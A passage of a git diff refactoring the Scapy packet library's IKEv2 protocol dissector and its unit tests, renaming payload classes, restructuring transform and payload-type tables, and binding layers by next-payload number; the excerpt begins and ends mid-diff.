6, - "HMAC-SHA1-160": 7, - "AES-CMAC-96": 8, - "AES-128-GMAC": 9, - "AES-192-GMAC": 10, - "AES-256-GMAC": 11, - "SHA2-256-128": 12, - "SHA2-384-192": 13, - "SHA2-512-256": 14, - }, 0), - "GroupDesc": (4, {"768MODPgr": 1, - "1024MODPgr": 2, - "1536MODPgr": 5, - "2048MODPgr": 14, - "3072MODPgr": 15, - "4096MODPgr": 16, - "6144MODPgr": 17, - "8192MODPgr": 18, - "256randECPgr": 19, - "384randECPgr": 20, - "521randECPgr": 21, - "1024MODP160POSgr": 22, - "2048MODP224POSgr": 23, - "2048MODP256POSgr": 24, - "192randECPgr": 25, - "224randECPgr": 26, - "brainpoolP224r1gr": 27, - "brainpoolP256r1gr": 28, - "brainpoolP384r1gr": 29, - "brainpoolP512r1gr": 30, - "curve25519gr": 31, - "curve448gr": 32, - "GOST3410_2012_256": 33, - "GOST3410_2012_512": 34, - }, 0), - "Extended Sequence Number": (5, {"No ESN": 0, - "ESN": 1}, 0), - } +IKEv2AttributeTypes = { + 1: ( + "Encryption", + { + 1: "DES-IV64", + 2: "DES", + 3: "3DES", + 4: "RC5", + 5: "IDEA", + 6: "CAST", + 7: "Blowfish", + 8: "3IDEA", + 9: "DES-IV32", + 12: "AES-CBC", + 13: "AES-CTR", + 14: "AES-CCM-8", + 15: "AES-CCM-12", + 16: "AES-CCM-16", + 18: "AES-GCM-8ICV", + 19: "AES-GCM-12ICV", + 20: "AES-GCM-16ICV", + 23: "Camellia-CBC", + 24: "Camellia-CTR", + 25: "Camellia-CCM-8ICV", + 26: "Camellia-CCM-12ICV", + 27: "Camellia-CCM-16ICV", + 28: "ChaCha20-Poly1305", + 32: "Kuzneychik-MGM-KTREE", + 33: "MAGMA-MGM-KTREE", + } + ), + 2: ( + "PRF", + { + 1: "PRF_HMAC_MD5", + 2: "PRF_HMAC_SHA1", + 3: "PRF_HMAC_TIGER", + 4: "PRF_AES128_XCBC", + 5: "PRF_HMAC_SHA2_256", + 6: "PRF_HMAC_SHA2_384", + 7: "PRF_HMAC_SHA2_512", + 8: "PRF_AES128_CMAC", + 9: "PRF_HMAC_STREEBOG_512", + } + ), + 3: ( + "Integrity", + { + 1: "HMAC-MD5-96", + 2: "HMAC-SHA1-96", + 3: "DES-MAC", + 4: "KPDK-MD5", + 5: "AES-XCBC-96", + 6: "HMAC-MD5-128", + 7: "HMAC-SHA1-160", + 8: "AES-CMAC-96", + 9: "AES-128-GMAC", + 10: "AES-192-GMAC", + 11: "AES-256-GMAC", + 12: "SHA2-256-128", + 13: "SHA2-384-192", + 14: "SHA2-512-256", + } + ), + 4: ( + "GroupDesc", + { + 1: "768MODPgr", + 2: "1024MODPgr", + 5: "1536MODPgr", + 14: "2048MODPgr", + 15: "3072MODPgr", + 16: "4096MODPgr", + 17: "6144MODPgr", + 18: "8192MODPgr", + 19: "256randECPgr", + 20: "384randECPgr", + 21: "521randECPgr", + 22: "1024MODP160POSgr", + 23: "2048MODP224POSgr", + 24: "2048MODP256POSgr", + 25: "192randECPgr", + 26: "224randECPgr", + 27: "brainpoolP224r1gr", + 28: "brainpoolP256r1gr", + 29: "brainpoolP384r1gr", + 30: "brainpoolP512r1gr", + 31: "curve25519gr", + 32: "curve448gr", + 33: "GOST3410_2012_256", + 34: "GOST3410_2012_512", + } + ), + 5: ( + "Extended Sequence Number", + { + 0: "No ESN", + 1: "ESN" + } + ), +} + +IKEv2TransformTypes = { + tf_num: tf_name for tf_name, (tf_num, _) in IKEv2AttributeTypes.items() +} + +IKEv2TransformAlgorithms = { + tf_num: tf_dict for tf_num, (_, tf_dict) in IKEv2AttributeTypes.items() +} + +IKEv2ProtocolTypes = { + 1: "IKE", + 2: "AH", + 3: "ESP" +} IKEv2AuthenticationTypes = { 0: "Reserved", @@ -399,62 +454,58 @@ 142: "Robust Header Compression", } -# the name 'IKEv2TransformTypes' is actually a misnomer (since the table -# holds info for all IKEv2 Attribute types, not just transforms, but we'll -# keep it for backwards compatibility... for now at least -IKEv2TransformTypes = IKEv2AttributeTypes - -IKEv2TransformNum = {} -for n in IKEv2TransformTypes: - val = IKEv2TransformTypes[n] - tmp = {} - for e in val[1]: - tmp[val[1][e]] = e - IKEv2TransformNum[val[0]] = tmp - -IKEv2Transforms = {} -for n in IKEv2TransformTypes: - IKEv2Transforms[IKEv2TransformTypes[n][0]] = n +IKEv2PayloadTypes = { + 0: "None", + 2: "Proposal", # used only inside the SA payload + 3: "Transform", # used only inside the SA payload + 33: "SA", + 34: "KE", + 35: "IDi", + 36: "IDr", + 37: "CERT", + 38: "CERTREQ", + 39: "AUTH", + 40: "Nonce", + 41: "Notify", + 42: "Delete", + 43: "VendorID", + 44: "TSi", + 45: "TSr", + 46: "Encrypted", + 47: "CP", + 48: "EAP", + 49: "GSPM", + 50: "IDg", + 51: "GSA", + 52: "KD", + 53: "Encrypted_Fragment", + 54: "PS" +} -del n -del e -del tmp -del val -# Note: Transform and Proposal can only be used inside the SA payload -IKEv2_payload_type = ["None", "", "Proposal", "Transform"] +IKEv2ExchangeTypes = { + 34: "IKE_SA_INIT", + 35: "IKE_AUTH", + 36: "CREATE_CHILD_SA", + 37: "INFORMATIONAL", + 38: "IKE_SESSION_RESUME", + 43: "IKE_INTERMEDIATE" +} -IKEv2_payload_type.extend([""] * 29) -IKEv2_payload_type.extend(["SA", "KE", "IDi", "IDr", "CERT", "CERTREQ", "AUTH", "Nonce", "Notify", "Delete", # noqa: E501 - "VendorID", "TSi", "TSr", "Encrypted", "CP", "EAP", "", "", "", "", "Encrypted_Fragment"]) # noqa: E501 -IKEv2_exchange_type = [""] * 34 -IKEv2_exchange_type.extend(["IKE_SA_INIT", "IKE_AUTH", "CREATE_CHILD_SA", - "INFORMATIONAL", "IKE_SESSION_RESUME"]) +class _IKEv2_Packet(Packet): + def default_payload_class(self, payload): + return IKEv2_Payload if self.next_payload else conf.raw_layer -class IKEv2_class(Packet): - def guess_payload_class(self, payload): - np = self.next_payload - logging.debug("For IKEv2_class np=%d", np) - if np == 0: - return conf.raw_layer - elif np < len(IKEv2_payload_type): - pt = IKEv2_payload_type[np] - logging.debug(globals().get("IKEv2_payload_%s" % pt, IKEv2_payload)) # noqa: E501 - return globals().get("IKEv2_payload_%s" % pt, IKEv2_payload) - else: - return IKEv2_payload - - -class IKEv2(IKEv2_class): # rfc4306 +class IKEv2(_IKEv2_Packet): # rfc4306 name = "IKEv2" fields_desc = [ - StrFixedLenField("init_SPI", "", 8), - StrFixedLenField("resp_SPI", "", 8), - ByteEnumField("next_payload", 0, IKEv2_payload_type), + XStrFixedLenField("init_SPI", "", 8), + XStrFixedLenField("resp_SPI", "", 8), + ByteEnumField("next_payload", 0, IKEv2PayloadTypes), XByteField("version", 0x20), - ByteEnumField("exch_type", 0, IKEv2_exchange_type), + ByteEnumField("exch_type", 0, IKEv2ExchangeTypes), FlagsField("flags", 0, 8, ["res0", "res1", "res2", "Initiator", "Version", "Response", "res6", "res7"]), # noqa: E501 IntField("id", 0), IntField("length", None) # Length of total message: packets + all payloads # noqa: E501 @@ -468,11 +519,6 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return ISAKMP return cls - def guess_payload_class(self, payload): - if self.flags & 1: - return conf.raw_layer - return IKEv2_class.guess_payload_class(self, payload) - def answers(self, other): if isinstance(other, IKEv2): if other.init_SPI == self.init_SPI: @@ -498,65 +544,57 @@ def h2i(self, pkt, x): return IntField.h2i(self, pkt, (x if x is not None else 0) | 0x800E0000) # noqa: E501 -class IKEv2_payload_Transform(IKEv2_class): - name = "IKE Transform" +class IKEv2_Payload(_IKEv2_Packet): + name = "IKEv2 Payload" fields_desc = [ - ByteEnumField("next_payload", None, {0: "last", 3: "Transform"}), - ByteField("res", 0), - ShortField("length", 8), - ByteEnumField("transform_type", None, IKEv2Transforms), + ByteEnumField("next_payload", None, IKEv2PayloadTypes), + FlagsField("flags", 0, 8, ["critical", "res1", "res2", "res3", "res4", "res5", "res6", "res7"]), # noqa: E501 + ShortField("length", None), + XStrLenField("load", "", length_from=lambda pkt: pkt.length - 4), + ] + + def post_build(self, pkt, pay): + if self.length is None: + pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] + return pkt + pay + + +class IKEv2_Transform(IKEv2_Payload): + name = "IKEv2 Transform" + fields_desc = IKEv2_Payload.fields_desc[:2] + [ + ShortField("length", 8), # can't be None, because 'key_length' depends on it + ByteEnumField("transform_type", None, IKEv2TransformTypes), ByteField("res2", 0), - MultiEnumField("transform_id", None, IKEv2TransformNum, depends_on=lambda pkt: pkt.transform_type, fmt="H"), # noqa: E501 + MultiEnumField("transform_id", None, IKEv2TransformAlgorithms, depends_on=lambda pkt: pkt.transform_type, fmt="H"), # noqa: E501 ConditionalField(IKEv2_Key_Length_Attribute("key_length"), lambda pkt: pkt.length > 8), # noqa: E501 ] -class IKEv2_payload_Proposal(IKEv2_class): +class IKEv2_Proposal(IKEv2_Payload): name = "IKEv2 Proposal" - fields_desc = [ - ByteEnumField("next_payload", None, {0: "last", 2: "Proposal"}), - ByteField("res", 0), - FieldLenField("length", None, "trans", "H", adjust=lambda pkt, x: x + 8 + (pkt.SPIsize if pkt.SPIsize else 0)), # noqa: E501 + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteField("proposal", 1), - ByteEnumField("proto", 1, {1: "IKEv2", 2: "AH", 3: "ESP"}), + ByteEnumField("proto", 1, IKEv2ProtocolTypes), FieldLenField("SPIsize", None, "SPI", "B"), ByteField("trans_nb", None), - StrLenField("SPI", "", length_from=lambda pkt: pkt.SPIsize), - PacketLenField("trans", conf.raw_layer(), IKEv2_payload_Transform, length_from=lambda pkt: pkt.length - 8 - pkt.SPIsize), # noqa: E501 - ] - - -class IKEv2_payload(IKEv2_class): - name = "IKEv2 Payload" - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - FlagsField("flags", 0, 8, ["critical", "res1", "res2", "res3", "res4", "res5", "res6", "res7"]), # noqa: E501 - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 4), - StrLenField("load", "", length_from=lambda x:x.length - 4), + XStrLenField("SPI", "", length_from=lambda pkt: pkt.SPIsize), + PacketLenField("trans", conf.raw_layer(), IKEv2_Transform, length_from=lambda pkt: pkt.length - 8 - pkt.SPIsize), # noqa: E501 ] -class IKEv2_payload_AUTH(IKEv2_class): +class IKEv2_AUTH(IKEv2_Payload): name = "IKEv2 Authentication" - overload_fields = {IKEv2: {"next_payload": 39}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteEnumField("auth_type", None, IKEv2AuthenticationTypes), X3BytesField("res2", 0), - StrLenField("load", "", length_from=lambda x:x.length - 8), + XStrLenField("load", "", length_from=lambda pkt: pkt.length - 8), ] -class IKEv2_payload_VendorID(IKEv2_class): +class IKEv2_VendorID(IKEv2_Payload): name = "IKEv2 Vendor ID" - overload_fields = {IKEv2: {"next_payload": 43}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "vendorID", "H", adjust=lambda pkt, x:x + 4), # noqa: E501 - StrLenField("vendorID", "", length_from=lambda x:x.length - 4), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + XStrLenField("vendorID", "", length_from=lambda pkt: pkt.length - 4), ] @@ -627,151 +665,113 @@ class RawTrafficSelector(TrafficSelector): fields_desc = [ ByteEnumField("TS_type", None, IKEv2TrafficSelectorTypes), ByteEnumField("IP_protocol_ID", None, IPProtocolIDs), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 4), + FieldLenField("length", None, "load", "H", adjust=lambda pkt, x: x + 4), PacketField("load", "", Raw) ] -class IKEv2_payload_TSi(IKEv2_class): +class IKEv2_TSi(IKEv2_Payload): name = "IKEv2 Traffic Selector - Initiator" - overload_fields = {IKEv2: {"next_payload": 44}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "traffic_selector", "H", adjust=lambda pkt, x:x + 8), # noqa: E501 + fields_desc = IKEv2_Payload.fields_desc[:3] + [ FieldLenField("number_of_TSs", None, fmt="B", count_of="traffic_selector"), X3BytesField("res2", 0), PacketListField("traffic_selector", None, TrafficSelector, - length_from=lambda x:x.length - 8, - count_from=lambda x:x.number_of_TSs), + length_from=lambda pkt: pkt.length - 8, + count_from=lambda pkt: pkt.number_of_TSs), ] -class IKEv2_payload_TSr(IKEv2_class): +class IKEv2_TSr(IKEv2_Payload): name = "IKEv2 Traffic Selector - Responder" - overload_fields = {IKEv2: {"next_payload": 45}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "traffic_selector", "H", adjust=lambda pkt, x:x + 8), # noqa: E501 + fields_desc = IKEv2_Payload.fields_desc[:3] + [ FieldLenField("number_of_TSs", None, fmt="B", count_of="traffic_selector"), X3BytesField("res2", 0), PacketListField("traffic_selector", None, TrafficSelector, - length_from=lambda x:x.length - 8, - count_from=lambda x:x.number_of_TSs), + length_from=lambda pkt: pkt.length - 8, + count_from=lambda pkt: pkt.number_of_TSs), ] -class IKEv2_payload_Delete(IKEv2_class): - name = "IKEv2 Vendor ID" - overload_fields = {IKEv2: {"next_payload": 42}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "vendorID", "H", adjust=lambda pkt, x:x + 4), # noqa: E501 - StrLenField("vendorID", "", length_from=lambda x:x.length - 4), +class IKEv2_Delete(IKEv2_Payload): + name = "IKEv2 Delete" + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + ByteEnumField("proto", None, {0: "Reserved", 1: "IKE", 2: "AH", 3: "ESP"}), # noqa: E501 + FieldLenField("SPIsize", None, "SPI", "B"), + ShortField("SPInum", 0), + FieldListField("SPI", [], + XStrLenField("", "", length_from=lambda pkt: pkt.SPIsize), + count_from=lambda pkt: pkt.SPInum) ] -class IKEv2_payload_SA(IKEv2_class): +class IKEv2_SA(IKEv2_Payload): name = "IKEv2 SA" - overload_fields = {IKEv2: {"next_payload": 33}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "prop", "H", adjust=lambda pkt, x:x + 4), - PacketLenField("prop", conf.raw_layer(), IKEv2_payload_Proposal, length_from=lambda x:x.length - 4), # noqa: E501 + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + PacketLenField("prop", conf.raw_layer(), IKEv2_Proposal, length_from=lambda pkt: pkt.length - 4), # noqa: E501 ] -class IKEv2_payload_Nonce(IKEv2_class): +class IKEv2_Nonce(IKEv2_Payload): name = "IKEv2 Nonce" - overload_fields = {IKEv2: {"next_payload": 40}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 4), - StrLenField("load", "", length_from=lambda x:x.length - 4), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + XStrLenField("nonce", "", length_from=lambda pkt: pkt.length - 4), ] -class IKEv2_payload_Notify(IKEv2_class): +class IKEv2_Notify(IKEv2_Payload): name = "IKEv2 Notify" - overload_fields = {IKEv2: {"next_payload": 41}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteEnumField("proto", None, {0: "Reserved", 1: "IKE", 2: "AH", 3: "ESP"}), # noqa: E501 FieldLenField("SPIsize", None, "SPI", "B"), ShortEnumField("type", 0, IKEv2NotifyMessageTypes), - StrLenField("SPI", "", length_from=lambda x: x.SPIsize), - StrLenField("load", "", length_from=lambda x: x.length - 8), + XStrLenField("SPI", "", length_from=lambda pkt: pkt.SPIsize), + XStrLenField("notify", "", length_from=lambda pkt: pkt.length - 8), ] -class IKEv2_payload_KE(IKEv2_class): +class IKEv2_KE(IKEv2_Payload): name = "IKEv2 Key Exchange" - overload_fields = {IKEv2: {"next_payload": 34}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), - ShortEnumField("group", 0, IKEv2TransformTypes['GroupDesc'][1]), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + ShortEnumField("group", 0, IKEv2TransformAlgorithms[4]), ShortField("res2", 0), - StrLenField("load", "", length_from=lambda x:x.length - 8), + XStrLenField("ke", "", length_from=lambda pkt: pkt.length - 8), ] -class IKEv2_payload_IDi(IKEv2_class): # RFC 7296, section 3.5 +class IKEv2_IDi(IKEv2_Payload): # RFC 7296, section 3.5 name = "IKEv2 Identification - Initiator" - overload_fields = {IKEv2: {"next_payload": 35}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteEnumField("IDtype", 1, {1: "IPv4_addr", 2: "FQDN", 3: "Email_addr", 5: "IPv6_addr", 11: "Key"}), # noqa: E501 X3BytesField("res2", 0), MultipleTypeField( [ - (IPField("ID", "127.0.0.1"), lambda x: x.IDtype == 1), - (IP6Field("ID", "::1"), lambda x: x.IDtype == 5), + (IPField("ID", "127.0.0.1"), lambda pkt: pkt.IDtype == 1), + (IP6Field("ID", "::1"), lambda pkt: pkt.IDtype == 5), ], - StrLenField("ID", "", length_from=lambda x: x.length - 8), + XStrLenField("ID", "", length_from=lambda pkt: pkt.length - 8), ) ] -class IKEv2_payload_IDr(IKEv2_class): # RFC 7296, section 3.5 +class IKEv2_IDr(IKEv2_Payload): # RFC 7296, section 3.5 name = "IKEv2 Identification - Responder" - overload_fields = {IKEv2: {"next_payload": 36}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "ID", "H", adjust=lambda pkt, x:x + 8), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteEnumField("IDtype", 1, {1: "IPv4_addr", 2: "FQDN", 3: "Email_addr", 5: "IPv6_addr", 11: "Key"}), # noqa: E501 X3BytesField("res2", 0), MultipleTypeField( [ - (IPField("ID", "127.0.0.1"), lambda x: x.IDtype == 1), - (IP6Field("ID", "::1"), lambda x: x.IDtype == 5), + (IPField("ID", "127.0.0.1"), lambda pkt: pkt.IDtype == 1), + (IP6Field("ID", "::1"), lambda pkt: pkt.IDtype == 5), ], - StrLenField("ID", "", length_from=lambda x: x.length - 8), + XStrLenField("ID", "", length_from=lambda pkt: pkt.length - 8), ) ] -class IKEv2_payload_Encrypted(IKEv2_class): +class IKEv2_Encrypted(IKEv2_Payload): name = "IKEv2 Encrypted and Authenticated" - overload_fields = {IKEv2: {"next_payload": 46}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 4), - StrLenField("load", "", length_from=lambda x:x.length - 4), - ] class ConfigurationAttribute(Packet): @@ -782,11 +782,11 @@ class ConfigurationAttribute(Packet): MultipleTypeField( [ (IPField("value", "127.0.0.1"), - lambda x: x.length == 4 and x.type in (1, 2, 3, 4, 6, 20)), + lambda pkt: pkt.length == 4 and pkt.type in (1, 2, 3, 4, 6, 20)), (IP6Field("value", "::1"), - lambda x: x.length == 16 and x.type in (10, 12, 21)), + lambda pkt: pkt.length == 16 and pkt.type in (10, 12, 21)), ], - StrLenField("value", "", length_from=lambda x: x.length), + XStrLenField("value", "", length_from=lambda pkt: pkt.length), ) ] @@ -794,99 +794,102 @@ def extract_padding(self, s): return b'', s -class IKEv2_payload_CP(IKEv2_class): # RFC 7296, section 3.15 +class IKEv2_CP(IKEv2_Payload): # RFC 7296, section 3.15 name = "IKEv2 Configuration" - overload_fields = {IKEv2: {"next_payload": 46}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ByteEnumField("CFGType", 1, IKEv2ConfigurationPayloadCFGTypes), X3BytesField("res2", 0), PacketListField("attributes", None, ConfigurationAttribute, - length_from=lambda x: x.length - 8), + length_from=lambda pkt: pkt.length - 8), ] -class IKEv2_payload_Encrypted_Fragment(IKEv2_class): - name = "IKEv2 Encrypted Fragment" - overload_fields = {IKEv2: {"next_payload": 53}} - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x: x + 8), # noqa: E501 +class IKEv2_Encrypted_Fragment(IKEv2_Payload): + name = "IKEv2 Encrypted and Authenticated Fragment" + fields_desc = IKEv2_Payload.fields_desc[:3] + [ ShortField("frag_number", 1), ShortField("frag_total", 1), - StrLenField("load", "", length_from=lambda x: x.length - 8), + XStrLenField("load", "", length_from=lambda pkt: pkt.length - 8), ] -class IKEv2_payload_CERTREQ(IKEv2_class): +class IKEv2_CERTREQ(IKEv2_Payload): name = "IKEv2 Certificate Request" - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "cert_data", "H", adjust=lambda pkt, x:x + 5), # noqa: E501 - ByteEnumField("cert_type", 0, IKEv2CertificateEncodings), - StrLenField("cert_data", "", length_from=lambda x:x.length - 5), + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + ByteEnumField("cert_encoding", 0, IKEv2CertificateEncodings), + XStrLenField("cert_authority", "", length_from=lambda pkt: pkt.length - 5), ] -class IKEv2_payload_CERT(IKEv2_class): - @classmethod - def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt and len(_pkt) >= 16: - ts_type = struct.unpack("!B", _pkt[4:5])[0] - if ts_type == 4: - return IKEv2_payload_CERT_CRT - elif ts_type == 7: - return IKEv2_payload_CERT_CRL - else: - return IKEv2_payload_CERT_STR - return IKEv2_payload_CERT_STR - - -class IKEv2_payload_CERT_CRT(IKEv2_payload_CERT): +class IKEv2_CERT(IKEv2_Payload): name = "IKEv2 Certificate" - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "x509Cert", "H", adjust=lambda pkt, x: x + 5), # noqa: E501 - ByteEnumField("cert_type", 4, IKEv2CertificateEncodings), - PacketLenField("x509Cert", X509_Cert(''), X509_Cert, length_from=lambda x:x.length - 5), # noqa: E501 + fields_desc = IKEv2_Payload.fields_desc[:3] + [ + ByteEnumField("cert_encoding", 4, IKEv2CertificateEncodings), + MultipleTypeField( + [ + (PacketLenField("cert_data", X509_Cert(), X509_Cert, + length_from=lambda pkt: pkt.length - 5), + lambda pkt: pkt.cert_encoding == 4), + (PacketLenField("cert_data", X509_CRL(), X509_CRL, + length_from=lambda pkt: pkt.length - 5), + lambda pkt: pkt.cert_encoding == 7) + ], + XStrLenField("cert_data", "", length_from=lambda pkt: pkt.length - 5), + ) ] -class IKEv2_payload_CERT_CRL(IKEv2_payload_CERT): - name = "IKEv2 Certificate" - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "x509CRL", "H", adjust=lambda pkt, x: x + 5), # noqa: E501 - ByteEnumField("cert_type", 7, IKEv2CertificateEncodings), - PacketLenField("x509CRL", X509_CRL(''), X509_CRL, length_from=lambda x:x.length - 5), # noqa: E501 - ] +# TODO: the following payloads are not fully dissected yet +class IKEv2_EAP(IKEv2_Payload): + name = "IKEv2 Extensible Authentication" + + +class IKEv2_GSPM(IKEv2_Payload): + name = "Generic Secure Password Method" + + +class IKEv2_IDg(IKEv2_Payload): + name = "Group Identification" + + +class IKEv2_GSA(IKEv2_Payload): + name = "Group Security Association" + + +class IKEv2_KD(IKEv2_Payload): + name = "Key Download" -class IKEv2_payload_CERT_STR(IKEv2_payload_CERT): - name = "IKEv2 Certificate" - fields_desc = [ - ByteEnumField("next_payload", None, IKEv2_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "cert_data", "H", adjust=lambda pkt, x: x + 5), # noqa: E501 - ByteEnumField("cert_type", 0, IKEv2CertificateEncodings), - StrLenField("cert_data", "", length_from=lambda x:x.length - 5), - ] +class IKEv2_PS(IKEv2_Payload): + name = "Puzzle Solution" -IKEv2_payload_type_overload = {} -for i, payloadname in enumerate(IKEv2_payload_type): - name = "IKEv2_payload_%s" % payloadname - if name in globals(): - IKEv2_payload_type_overload[globals()[name]] = {"next_payload": i} -del i, payloadname, name -IKEv2_class._overload_fields = IKEv2_payload_type_overload.copy() +# bind all IKEv2 payload classes together +bind_layers(_IKEv2_Packet, IKEv2_Proposal, next_payload=2) +bind_layers(_IKEv2_Packet, IKEv2_Transform, next_payload=3) +bind_layers(_IKEv2_Packet, IKEv2_SA, next_payload=33) +bind_layers(_IKEv2_Packet, IKEv2_KE, next_payload=34) +bind_layers(_IKEv2_Packet, IKEv2_IDi, next_payload=35) +bind_layers(_IKEv2_Packet, IKEv2_IDr, next_payload=36) +bind_layers(_IKEv2_Packet, IKEv2_CERT, next_payload=37) +bind_layers(_IKEv2_Packet, IKEv2_CERTREQ, next_payload=38) +bind_layers(_IKEv2_Packet, IKEv2_AUTH, next_payload=39) +bind_layers(_IKEv2_Packet, IKEv2_Nonce, next_payload=40) +bind_layers(_IKEv2_Packet, IKEv2_Notify, next_payload=41) +bind_layers(_IKEv2_Packet, IKEv2_Delete, next_payload=42) +bind_layers(_IKEv2_Packet, IKEv2_VendorID, next_payload=43) +bind_layers(_IKEv2_Packet, IKEv2_TSi, next_payload=44) +bind_layers(_IKEv2_Packet, IKEv2_TSr, next_payload=45) +bind_layers(_IKEv2_Packet, IKEv2_Encrypted, next_payload=46) +bind_layers(_IKEv2_Packet, IKEv2_CP, next_payload=47) +bind_layers(_IKEv2_Packet, IKEv2_EAP, next_payload=48) +bind_layers(_IKEv2_Packet, IKEv2_GSPM, next_payload=49) +bind_layers(_IKEv2_Packet, IKEv2_IDg, next_payload=50) +bind_layers(_IKEv2_Packet, IKEv2_GSA, next_payload=51) +bind_layers(_IKEv2_Packet, IKEv2_KD, next_payload=52) +bind_layers(_IKEv2_Packet, IKEv2_Encrypted_Fragment, next_payload=53) +bind_layers(_IKEv2_Packet, IKEv2_PS, next_payload=54) # the upper bindings for port 500 to ISAKMP are handled by IKEv2.dispatch_hook split_bottom_up(UDP, ISAKMP, dport=500) @@ -958,4 +961,4 @@ def guess_payload_class(self, payload): def ikev2scan(ip, **kwargs): """Send a IKEv2 SA to an IP and wait for answers.""" return sr(IP(dst=ip) / UDP() / IKEv2(init_SPI=RandString(8), - exch_type=34) / IKEv2_payload_SA(prop=IKEv2_payload_Proposal()), **kwargs) # noqa: E501 + exch_type=34) / IKEv2_SA(prop=IKEv2_Proposal()), **kwargs) # noqa: E501 diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index c6ecd01b059..4e35345c5d2 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -16,19 +16,19 @@ assert raw(a) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ = Ikev2 dissection a = IKEv2(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00! \x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x14\x00\x00\x00\x10\x01\x01\x00\x00\x00\x00\x00\x08\x02\x00\x00\x03") -assert a[IKEv2_payload_Transform].transform_type == 2 -assert a[IKEv2_payload_Transform].transform_id == 3 +assert a[IKEv2_Transform].transform_type == 2 +assert a[IKEv2_Transform].transform_id == 3 assert a.next_payload == 33 -assert a[IKEv2_payload_SA].next_payload == 0 -assert a[IKEv2_payload_Proposal].next_payload == 0 -assert a[IKEv2_payload_Proposal].proposal == 1 -assert a[IKEv2_payload_Transform].next_payload == 0 -a[IKEv2_payload_Transform].show() +assert a[IKEv2_SA].next_payload == 0 +assert a[IKEv2_Proposal].next_payload == 0 +assert a[IKEv2_Proposal].proposal == 1 +assert a[IKEv2_Transform].next_payload == 0 +a[IKEv2_Transform].show() = Build Ikev2 SA request packet -a = IKEv2(init_SPI="MySPI",exch_type=34)/IKEv2_payload_SA(prop=IKEv2_payload_Proposal()) +a = IKEv2(init_SPI="MySPI",exch_type=34)/IKEv2_SA(prop=IKEv2_Proposal()) assert raw(a) == b'MySPI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00! "\x00\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x0c\x00\x00\x00\x08\x01\x01\x00\x00' = Build advanced IKEv2 @@ -39,18 +39,18 @@ key_exchange = binascii.unhexlify('bb41bb41cfaf34e3b3209672aef1c51b9d52919f1781d nonce = binascii.unhexlify('8dfcf8384c5c32f1b294c64eab69f98e9d8cf7e7f352971a91ff6777d47dffed') nat_detection_source_ip = binascii.unhexlify('e64c81c4152ad83bd6e035009fbb900406be371f') nat_detection_destination_ip = binascii.unhexlify('28cd99b9fa1267654b53f60887c9c35bcf67a8ff') -transform_1 = IKEv2_payload_Transform(next_payload = 'Transform', transform_type = 'Encryption', transform_id = 12, length = 12, key_length = 0x80) -transform_2 = IKEv2_payload_Transform(next_payload = 'Transform', transform_type = 'PRF', transform_id = 